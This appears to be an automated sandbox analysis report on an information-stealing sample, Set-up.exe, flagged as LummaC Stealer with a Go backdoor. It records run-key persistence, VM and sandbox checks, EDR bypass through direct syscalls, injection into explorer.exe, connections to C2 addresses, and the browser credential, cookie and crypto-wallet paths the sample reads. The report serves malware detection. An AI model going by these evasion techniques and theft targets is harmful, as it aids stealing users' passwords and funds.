                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\dynamiclink.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\PRM.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\ertyayyeqtcsJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SecAVJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SecAVJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Found hidden mapped module (file has been removed from disk)
                  Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\ERTYAYYEQTCS
                  Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                  Query firmware table information (likely to detect VMs)
                  Source: C:\Users\user\Desktop\Set-up.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeAPI/Special instruction interceptor: Address: 6CCF7C44
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeAPI/Special instruction interceptor: Address: 6CCF7945
                  Source: C:\Windows\SysWOW64\more.comAPI/Special instruction interceptor: Address: 6CCF3B54
                  Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: E5A317
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: Set-up.exe, 00000001.00000000.1203909228.00000000013D4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: P`8P`ERROR MESSAGEERROR NOT SUPPORT SYSTEMMPVMP32ENTRYKERNEL32.DLLERROR MESSAGEERROR NOT SUPPORT SYSTEMERROR MESSAGEERROR NOT SUPPORT SYSTEMERROR MESSAGEERROR NOT SUPPORT SYSTEMVMTOOLSD.EXECUCKOO_SVC.EXEXENSERVICE.EXEPROCMON.EXE5#
                  Source: C:\Windows\SysWOW64\more.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ertyayyeqtcsJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeAPI coverage: 0.3 %
                  Source: C:\Users\user\Desktop\Set-up.exe TID: 7620Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 7732Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_009D44A0 ??2@YAPAXI@Z,GetLogicalDriveStringsW,GetDriveTypeW,?assign@?$basic_string@GU?$char_traits@G@std@@V?$STLAllocator@G@SmallBlockAllocator@utility@dvacore@@@std@@QAEAAV12@ABV12@II@Z,?append@?$basic_string@GU?$char_traits@G@std@@V?$STLAllocator@G@SmallBlockAllocator@utility@dvacore@@@std@@QAEAAV12@PBGI@Z,?Dispose@SmallBlockAllocator@utility@dvacore@@YAXPAXI@Z,?Dispose@SmallBlockAllocator@utility@dvacore@@YAXPAXI@Z,15_2_009D44A0
                  Source: Server.exe, 0000000F.00000002.2450013196.0000000000608000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                  Source: K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3673515172.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                  Source: Set-up.exe, 00000001.00000000.1203909228.00000000013D4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: P`8P`Error messageError not support systemMpVmp32Entrykernel32.dllError messageError not support systemError messageError not support systemError messageError not support systemvmtoolsd.execuckoo_svc.exexenservice.exeprocmon.exe5#
                  Source: Set-up.exe, 00000001.00000003.1872993829.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.2102508777.00000000015A5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1898990474.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1951577261.00000000015A5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1873565102.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3675598739.000000000335F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2504610783.000000000335C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Server.exe, 0000000C.00000002.2383652464.00000000008BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
                  Source: C:\Users\user\Desktop\Set-up.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_004A5DE2 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,12_2_004A5DE2
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_009C4D50 GetProcessHeap,HeapAlloc,??0exception@std@@QAE@ABQBDH@Z,??0thread_data_base@detail@boost@@QAE@XZ,15_2_009C4D50
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_004A5DE2 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,12_2_004A5DE2
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_00622CDE IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,12_2_00622CDE
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_0066D9C0 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,12_2_0066D9C0
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_004A5DE2 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,15_2_004A5DE2
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_00512CDE IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,15_2_00512CDE

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 62.60.234.80 1466Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 15.197.198.189 8545Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 3.161.82.59 80Jump to behavior
                  Found direct / indirect Syscall (likely to bypass EDR)
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeNtProtectVirtualMemory: Direct from: 0x777463E1Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeNtProtectVirtualMemory: Direct from: 0x77747B2EJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeNtSetInformationThread: Direct from: 0x100068E4Jump to behavior
                  Injects code into the Windows Explorer (explorer.exe)
                  Source: C:\Windows\SysWOW64\more.comMemory written: PID: 5436 base: E579C0 value: 55Jump to behavior
                  Source: C:\Windows\SysWOW64\more.comMemory written: PID: 5436 base: BF4008 value: 00Jump to behavior
                  Source: C:\Windows\SysWOW64\more.comMemory written: PID: 5436 base: 1E0000 value: 00Jump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\more.comSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\explorer.exe base: E579C0Jump to behavior
                  Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\explorer.exe base: BF4008Jump to behavior
                  Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\explorer.exe base: 1E0000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                  Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_004A679A GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,12_2_004A679A
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_008DE970 ?GetVersionString@config@dvacore@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$STLAllocator@G@SmallBlockAllocator@utility@dvacore@@@std@@XZ,?assign@?$basic_string@EU?$char_traits@E@std@@V?$STLAllocator@E@SmallBlockAllocator@utility@dvacore@@@std@@QAEAAV12@PBEI@Z,?append@?$basic_string@EU?$char_traits@E@std@@V?$STLAllocator@E@SmallBlockAllocator@utility@dvacore@@@std@@QAEAAV12@PBEI@Z,?append@?$basic_string@EU?$char_traits@E@std@@V?$STLAllocator@E@SmallBlockAllocator@utility@dvacore@@@std@@QAEAAV12@PBEI@Z,?UTF8to16@utility@dvacore@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$STLAllocator@G@SmallBlockAllocator@utility@dvacore@@@std@@ABV?$basic_string@EU?$char_traits@E@std@@V?$STLAllocator@E@SmallBlockAllocator@utility@dvacore@@@4@PAW4UnicodeErrorCode@12@PAI@Z,?Dispose@SmallBlockAllocator@utility@dvacore@@YAXPAXI@Z,15_2_008DE970
                  Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Set-up.exe, 00000001.00000003.1898990474.0000000001578000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1951577261.0000000001578000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1898990474.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1951577261.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1898990474.000000000158F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected GO Backdoor
                  Source: Yara matchFile source: Process Memory Space: K07BOQJSAWQXKEH8FTYNN.exe PID: 6964, type: MEMORYSTR
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 7820, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: Set-up.exe, 00000001.00000003.1872993829.00000000015AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                  Source: Set-up.exe, 00000001.00000003.1872993829.00000000015AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                  Source: Set-up.exe, 00000001.00000003.1872993829.00000000015AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
                  Source: Set-up.exe, 00000001.00000003.1872993829.00000000015AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: Set-up.exe, 00000001.00000003.1872993829.00000000015AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: Set-up.exe, 00000001.00000003.1872993829.00000000015AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: Set-up.exe, 00000001.00000003.1951577261.000000000158F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: Set-up.exe, 00000001.00000003.1873144760.0000000003D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: keystore
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
